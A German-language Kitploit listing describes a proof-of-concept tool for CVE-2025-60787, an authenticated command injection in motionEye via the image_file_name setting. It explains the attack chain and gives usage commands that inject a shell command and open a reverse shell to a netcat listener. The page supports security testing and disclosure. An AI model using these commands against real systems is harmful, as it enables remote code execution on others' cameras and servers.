Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-60787 — CVE-2025-60787 motionEye authentifizierte Command-Injection RCE PoC | Kitploit
Tools/GitHubGitHub/ozcanpng/cve-2025-60787
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubozcanpng/cve-2025-60787

CVE-2025-60787

CVE-2025-60787 motionEye authentifizierte Command-Injection RCE PoC

Repository anzeigen
2vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-60787 — motionEye Authentifizierte RCE

Authentifizierte Command-Injection-PoC für CVE-2025-60787. motionEye v0.43.1b4 und frühere Versionen schreiben benutzergesteuerte Kamera-Konfigurationswerte wie image_file_name ohne ausreichende Bereinigung in die Motion-Konfiguration, was die Befehlsausführung ermöglicht, wenn der Wert verarbeitet wird.

Nur für autorisierte Tests und Forschung. Nicht gegen Systeme verwenden, die dir nicht gehören oder für die du keine ausdrückliche Testgenehmigung hast.


Funktionen

root@kitploit:~
Signed API request -> camera config update -> image_file_name injection -> snapshot trigger -> command execution
  1. Validiert das Ziel und erkennt motionEye.
  2. Generiert signierte motionEye-API-Anfragen mit dem konfigurierten Benutzernamen und Passwort-Hash.
  3. Liest die Kamera-Konfiguration über /config/list/.
  4. Injiziert einen Befehl in die Kamera-Einstellung image_file_name.
  5. Aktiviert bei Bedarf Standbilder/manuelle Schnappschüsse.
  • Löst /action/<camera_id>/snapshot/ aus, damit motionEye den injizierten Dateinamen verarbeitet.
  • Stellt optional die ursprüngliche Kamera-Konfiguration wieder her.

  • Screenshots

    Reverse-Shell-Einrichtung

    Reverse-Shell-Einrichtung

    Konfigurationsinjektion und Auslösung

    Konfigurationsinjektion und Auslösung

    Shell empfangen

    Shell empfangen


    Einrichtung

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2025-60787.git
    cd CVE-2025-60787
    pip install -r requirements.txt
    

    Verwendung

    Sicherer Befehlsnachweis

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --user admin \
      --password-hash HASH \
      --cmd 'id > /tmp/motioneye_rce'
    

    Reverse Shell

    Zuerst einen Listener starten:

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    Dann ausführen:

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --port 8765 \
      --user admin \
      --password-hash HASH \
      --reverse-shell \
      --lhost 10.10.16.53 \
      --lport 4444
    

    Nützliche Optionen:

    root@kitploit:~
    --camera-id N      Kamera-ID, die geändert werden soll (Standard: 1)
    --restore          Stellt die ursprüngliche Kamera-Konfiguration nach dem Auslösen wieder her
    --dry-run          Erstellt signierte Anfragen, ohne das Ziel zu verändern
    --debug            Gibt kanonische signierte Pfade, Bodies und Signaturen aus
    --no-trigger       Aktualisiert die Konfiguration, ohne einen Schnappschuss auszulösen
    --verify-tls       Verifiziert HTTPS-Zertifikate
    --yes              Überspringt die Bestätigungsabfrage für die Reverse Shell
    

    Betroffen

    ProduktBetroffene VersionErforderlicher ZugriffAuswirkung
    motionEye<= 0.43.1b4Authentifizierter Admin-/API-ZugriffOS-Befehlsausführung als motionEye-/Motion-Prozessbenutzer

    Die resultierenden Rechte hängen davon ab, wie motionEye bereitgestellt wird. In Containern oder Labor-Images, die den Dienst als Root ausführen, kann die Befehlsausführung als Root erfolgen.


    Hinweise

    • Die PoC erwartet den gespeicherten motionEye-Passwortwert/-Hash, da dieser Wert als Signaturschlüssel für Legacy-API-Anfragen verwendet wird.
    • Das injizierte Feld ist image_file_name.
    • Verwende während des Tests --restore, um die ursprüngliche Kamera-Konfiguration nach der Ausnutzung wiederherzustellen.
    • Bevorzuge --cmd für eine sichere Validierung, bevor du eine Reverse Shell versuchst.

    Referenzen

    • NVD — CVE-2025-60787
    • GitHub Security Advisory — GHSA-j945-qm58-4gjx
    • motionEye-Projekt

    Autor

    ozcanpng — github.com/ozcanpng — ozcanpng.dev

    Tool herunterladen